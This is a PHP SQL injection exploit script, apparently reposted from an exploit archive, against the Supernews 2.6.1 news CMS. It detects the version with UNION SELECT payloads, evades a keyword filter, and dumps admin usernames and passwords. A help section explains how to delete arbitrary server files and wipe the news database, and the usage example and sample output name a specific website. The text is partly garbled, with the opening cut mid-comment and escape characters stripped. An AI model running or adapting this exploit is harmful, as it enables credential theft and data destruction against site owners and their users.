Supernews 2.6.1 sql注入漏洞

2.6.1 :-)
[!] Administration panel: http://www.hedysx.com/news/admin/adm_noticias.php
[i] Type "exploit.php moreinfo" for get others vulnerabilities.
[*] Getting user & pass 8-]
User: user1
Pass: pass1

User: user2
Pass: pass2

Good luck! 😀

*/

error_reporting(E_ERROR);
set_time_limit(0);
@ini_set("default_socket_timeout", 30);

function hex($string){
$hex=''; // PHP 'Dim' =]
for ($i=0; $i < strlen($string); $i++){ $hex .= dechex(ord($string[$i])); } return '0x'.$hex; } function str_replace_every_other($needle, $replace, $haystack, $count=null, $replace_first=true) { $count = 0; $offset = strpos($haystack, $needle); //If we don't replace the first, go ahead and skip it if (!$replace_first) { $offset += strlen($needle); $offset = strpos($haystack, $needle, $offset); } while ($offset !== false) { $haystack = substr_replace($haystack, $replace, $offset, strlen($needle)); $count++; $offset += strlen($replace); $offset = strpos($haystack, $needle, $offset); if ($offset !== false) { $offset += strlen($needle); $offset = strpos($haystack, $needle, $offset); } } return $haystack; } function removeaddregex($str) { return str_replace_every_other('(.*)', '', $str, null, false); } function preg_quote_working($str) { $chars = explode(" ", " . + * ? [ ^ ] $ ( ) { } = ! < > | :");
foreach($chars as $char) {
$str = str_replace($char, "".$char, $str);
}
return $str;
}

echo "nSupernews <= 2.6.1 SQL Injection Exploit"; echo "nCoded by 08sec - www.08sec.comnUse at your own risk.nn"; if($argc!=2) { echo "Usage: php $argv[0] url Example: php $argv[0] http://www.hedysx.com/supernews php $argv[0] https://www.hedysx.com/supernews/"; exit; } if($argv[1]=="moreinfo") { echo "nMore vulnerabilities: - Deleting files You can delete files on the server, after login, using the URL: http://server.com/admin/adm_noticias.php?deleta=ID&unlink=FILE Replace "ID" with a valid post ID (will be deleted) and FILE with the file address on the server. - Deleting all news on the database: You can delete all news on the database with one request, only. Look: http://server.com/admin/adm_noticias.php?deleta=0%20or%201=1--+ All vulnerabilities discovered by WCGroup.n"; exit; } $uri = $argv[1]; if(substr($uri, -1, 1)!="/") { $uri .= "/"; } $url = $uri."noticias.php?noticia=".urlencode("-1")."+"; echo "n[*] Trying to access server..."; $accessvr = @file_get_contents($url); if(($accessvr==false) OR (preg_match("/(404|mysql_query)/", $accessvr))) { $url = $uri."index.php?noticia=".urlencode("-1")."+"; } $token = substr(md5(chr(rand(48, 122))), 0, 10); echo "n[*] Detecting version... :-o"; $gettoken = strip_tags(file_get_contents($url.urlencode("union all select 1,2,3,4,".hex($token).",6,7-- "))); if(preg_match("/".$token."/", $gettoken)) { echo "n[!] Version: >2.6.1 :-)";
$version = 1;
} else {
$gettoken = strip_tags(file_get_contents($url.urlencode("uniunionon seleselectct 1,2,3,4,5,".hex($token).",7,8-- ")));
if(preg_match("/".$token."/", $gettoken)) {
echo "n[!] Version =2.6.1 :-)";
$version = 2;
} else {
echo "n[-] Unknown version :-S";
$version = 3;
}
}
if($version!=3) {
echo "n[!] Administration panel: {$uri}admin/adm_noticias.php";
echo "n[i] Type "$argv[0] moreinfo" for get others vulnerabilities.";
echo "n[*] Getting user & pass 8-]";
}

if($version==1) {
$i = 0;
while(true) {
$request = strip_tags(file_get_contents($url.urlencode("union all select 1,2,3,4,concat(".hex($token).",user,".hex($token).",pass,".hex($token)."),6,7 from supernews_login limit $i,1-- ")));
preg_match_all("/$token(.*)$token(.*)$token/", $request, $get);
if($get[1][0]!="") {
$user = $get[1][0];
$pass = $get[2][0];
echo "nUser: $usernPass: $passn";
$i++;
} else {
echo "nGood luck! :-D";
break;
}
}
}
elseif($version==2) {
$i = 0;
while(true) {
$request = strip_tags(file_get_contents($url.urlencode("uniunionon seleselectct 1,2,3,4,5,concat(".hex($token).",user,".hex($token).",pass,".hex($token)."),7,8 from supernews_login limit $i,1-- ")));
preg_match_all("/$token(.*)$token(.*)$token/", $request, $get);
if($get[1][0]!="") {
$user = $get[1][0];
$pass = $get[2][0];
echo "nUser: $usernPass: $passn";
$i++;
} else {
echo "nGood luck! :-D";
break;
}
}
}
else {
echo "nnThis site are using an unknown version of Supernews or another CMS.";
echo "nPlease note that only versions <= 2.6.1 of Supernews are vulnerable."; echo "nWebservers with modules or firewalls like "mod_security" aren't vulnerables."; echo "nIf you want, try to access manually:"; echo "nThe vulnerability are on view notice file (index.php or noticia.php), in variable "noticia", a simple SQL Injection."; echo "nWe're sorry."; } echo "n"; [/code]